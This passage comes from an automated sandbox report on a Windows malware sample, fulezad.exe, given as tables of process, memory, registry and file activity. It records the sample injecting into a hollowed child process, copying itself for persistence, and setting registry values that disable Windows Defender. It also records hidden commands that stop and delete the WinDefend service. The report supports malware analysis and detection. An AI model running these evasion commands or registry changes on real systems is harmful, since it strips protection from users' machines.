| Create | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | os_pid = 0x8bc, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\aetadzjz\appdata\local\temp\fulezad.exe | os_tid = 0x8e8 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\temp\fulezad.exe | os_tid = 0x8e8 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\temp\fulezad.exe | os_tid = 0x8e8 |
|
1 |
Memory (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | address = 0x7efde008, size = 4 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | address = 0x7efde008, size = 4 |
|
1 |
Module (9)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\fulezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\fulezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe, size = 259 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x76551856 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x76557a10 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1576436 |
|
1 | |
| Map | - | process_name = C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\local\temp\fulezad.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x350000 |
|
1 |
System (251)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:41:46 (UTC) |
|
250 | |
| Get Time | type = Ticks, time = 145892 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #5: fulezad.exe
30
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\aetadzjz\appdata\local\temp\fulezad.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:40, Reason: Child Process |
| Unmonitor | End Time: 00:01:51, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8bc |
| Parent PID | 0x8e4 (c:\users\aetadzjz\appdata\local\temp\fulezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8B8
0x
918
0x
8D8
0x
8C8
0x
8CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x001b0000 | 0x001cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00260fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00370000 | 0x003d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| fulezad.exe | 0x00400000 | 0x00479fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x0042afff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x00740fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x01b4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b50000 | 0x01b50000 | 0x01b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01c8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x0209ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01c90000 | 0x01f5efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001f60000 | 0x01f60000 | 0x0236ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x01f60000 | 0x01f9bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002030000 | 0x02030000 | 0x0210efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000020a0000 | 0x020a0000 | 0x024affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x0220ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0230ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002310000 | 0x02310000 | 0x0234ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002350000 | 0x02350000 | 0x0244ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002370000 | 0x02370000 | 0x0277ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| cmlua.dll | 0x747c0000 | 0x747cbfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x749b0000 | 0x749bdfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x749c0000 | 0x749fafff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x74a00000 | 0x74a0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74a20000 | 0x74a28fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74bb0000 | 0x74bc5fff | Memory Mapped File | rwx |
|
|
|
- |
| comsvcs.dll | 0x74df0000 | 0x74f25fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75050000 | 0x750cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x75220000 | 0x75233fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x752d0000 | 0x752dcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #4: c:\users\aetadzjz\appdata\local\temp\fulezad.exe | 0x8e8 | address = 0x400000, size = 176128 |
|
1 | |
| Modify Memory | #4: c:\users\aetadzjz\appdata\local\temp\fulezad.exe | 0x8e8 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Control Flow | #4: c:\users\aetadzjz\appdata\local\temp\fulezad.exe | 0x8e8 | os_tid = 0x8b8, address = 0x777d01c4 |
|
1 |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | 372.83 KB |
MD5:
a748a4e6151f6d75cf93b2f899df23df
SHA1: 08f90b5474ba8e250d9b824602fe4cec6366bc48 SHA256: 2044fcca53a6dc26425147b78971bee2225f4e8ea3e096100e4edfbad1dac16d SSDeep: 6144:X11gGxJkPcgfqAAJ6ONxZ4cYjxfaQYf1QbicnRcftAhQgGNxRUc:X11goJkP/NAJEcYd7YfEc+AB |
|
|
Host Behavior
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Directory | C:\Users\aETAdzjz\AppData\Roaming\cleanmem | - |
|
1 | |
| Copy | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | source_filename = C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | - |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x924, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x910, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x900, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (6)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | advapi32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | WTSAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | shell32.dll | base_address = 0x0 |
|
1 | |
| Get Filename | shell32.dll | process_name = c:\users\aetadzjz\appdata\local\temp\fulezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe, size = 260 |
|
1 |
Service (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
3 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Process #6: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:43, Reason: Child Process |
| Unmonitor | End Time: 00:01:47, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x924 |
| Parent PID | 0x8bc (c:\users\aetadzjz\appdata\local\temp\fulezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
920
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x00567fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d40000 | 0x01d40000 | 0x02082fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02090000 | 0x0235efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a550000 | 0x4a59bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x398, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a550000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 162974 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #7: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:43, Reason: Child Process |
| Unmonitor | End Time: 00:01:47, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x910 |
| Parent PID | 0x8bc (c:\users\aetadzjz\appdata\local\temp\fulezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
91C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
